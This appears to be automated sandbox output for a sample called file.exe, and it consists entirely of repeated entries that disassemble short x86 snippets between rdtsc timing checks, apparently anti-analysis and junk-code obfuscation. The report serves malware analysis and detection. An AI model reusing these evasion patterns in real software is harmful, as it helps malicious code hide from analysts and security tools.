Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C838D second address: 10C83CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 call 00007FD648BC9AD4h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 and ecx, dword ptr [ebp+122D38C6h] 0x00000016 popad 0x00000017 pop ecx 0x00000018 lea ebx, dword ptr [ebp+1245CD80h] 0x0000001e mov ecx, dword ptr [ebp+122D39BEh] 0x00000024 push eax 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD648BC9ACBh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C83CF second address: 10C83D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D8BFB second address: 10D8C2C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD648BC9AD3h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007FD648BC9ACCh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E9154 second address: 10E9158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E9158 second address: 10E9165 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B88EF second address: 10B88F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7067 second address: 10E706B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E706B second address: 10E707B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD648C0B44Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E707B second address: 10E708C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9ACDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7462 second address: 10E7467 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7467 second address: 10E748A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD648BC9AC6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648BC9AD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E75C7 second address: 10E75DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FD648C0B44Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7BF8 second address: 10E7C0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD648BC9ACEh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7E65 second address: 10E7E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD648C0B446h 0x0000000a js 00007FD648C0B446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7E77 second address: 10E7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FD648BC9AC8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7E84 second address: 10E7EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD648C0B44Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7EA2 second address: 10E7EB2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7EB2 second address: 10E7EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8057 second address: 10E805D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E805D second address: 10E8063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E872B second address: 10E873C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FD648BC9AC6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E873C second address: 10E8742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8742 second address: 10E8747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E88C9 second address: 10E88D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A19 second address: 10E8A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A23 second address: 10E8A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A28 second address: 10E8A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A2E second address: 10E8A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B457h 0x00000007 jmp 00007FD648C0B457h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FD648C0B453h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A76 second address: 10E8A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A7C second address: 10E8A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD648C0B44Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A96 second address: 10E8A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A9A second address: 10E8A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A9E second address: 10E8AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD648BC9ACAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648BC9AD9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8AC9 second address: 10E8ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8C55 second address: 10E8C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9ACEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8C67 second address: 10E8C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8C70 second address: 10E8C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD648BC9AC6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8C7B second address: 10E8C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD648C0B446h 0x0000000a jg 00007FD648C0B446h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E9000 second address: 10E9027 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD648BC9AC6h 0x00000008 jmp 00007FD648BC9ACCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD648BC9ACFh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F08F3 second address: 10F0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD648C0B450h 0x0000000a popad 0x0000000b push ebx 0x0000000c jg 00007FD648C0B452h 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0921 second address: 10F0927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BD7D6 second address: 10BD7FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD648C0B457h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FD648C0B446h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAB25 second address: 10FAB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAB29 second address: 10FAB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B452h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAB3F second address: 10FAB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FABCC second address: 10FABD6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD648C0B446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FABD6 second address: 10FAC18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FD648BC9AD8h 0x00000012 pop eax 0x00000013 movzx esi, si 0x00000016 or di, 23AAh 0x0000001b push F8F00F5Ah 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jg 00007FD648BC9AC6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAC18 second address: 10FAC30 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD648C0B446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD648C0B44Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAC30 second address: 10FAC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAD79 second address: 10FAD9F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD648C0B45Ch 0x00000008 jmp 00007FD648C0B456h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAD9F second address: 10FADBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAF0E second address: 10FAF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB260 second address: 10FB265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB71C second address: 10FB720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB78B second address: 10FB790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB980 second address: 10FB989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FBDD0 second address: 10FBE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FD648BC9AD7h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FD648BC9AC8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call 00007FD648BC9AD7h 0x0000002b cld 0x0000002c pop edi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 js 00007FD648BC9AC8h 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FFF4C second address: 10FFF52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FFC68 second address: 10FFC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FFC6C second address: 10FFC72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FFC72 second address: 10FFC77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BA2EB second address: 10BA2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BA2F1 second address: 10BA323 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FD648BC9AD2h 0x00000010 jmp 00007FD648BC9AD4h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BA323 second address: 10BA33F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B458h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BA33F second address: 10BA343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BA343 second address: 10BA34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102170 second address: 11021AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007FD648BC9ADCh 0x0000000b jmp 00007FD648BC9AD6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD648BC9AD5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11021AB second address: 11021AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11021AF second address: 1102216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1BAEh], edi 0x0000000e mov dword ptr [ebp+124887AEh], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FD648BC9AC8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov esi, dword ptr [ebp+12488860h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007FD648BC9AC8h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102216 second address: 110221A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110221A second address: 110221E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110221E second address: 1102224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102D7E second address: 1102D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1105F7F second address: 1105FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD648C0B457h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110703F second address: 1107045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ACB8D second address: 10ACB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11071B2 second address: 11071B7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ACB93 second address: 10ACBA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FD648C0B446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ACBA5 second address: 10ACBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ACBA9 second address: 10ACBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD648C0B459h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ACBD0 second address: 10ACBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110960D second address: 1109613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110A5CF second address: 110A5F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FD648BC9AC6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD648BC9AD2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110A5F1 second address: 110A5FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11097C3 second address: 11097C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110A5FB second address: 110A5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110C60E second address: 110C613 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110C613 second address: 110C648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jns 00007FD648C0B450h 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D29A8h] 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+122D2C3Ah] 0x0000001d push 00000000h 0x0000001f mov bh, D5h 0x00000021 xchg eax, esi 0x00000022 push ecx 0x00000023 jc 00007FD648C0B44Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110B8B1 second address: 110B8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110C648 second address: 110C65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007FD648C0B446h 0x0000000f jnc 00007FD648C0B446h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110D562 second address: 110D571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9ACAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110D571 second address: 110D585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B450h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110C850 second address: 110C854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110D7F9 second address: 110D7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
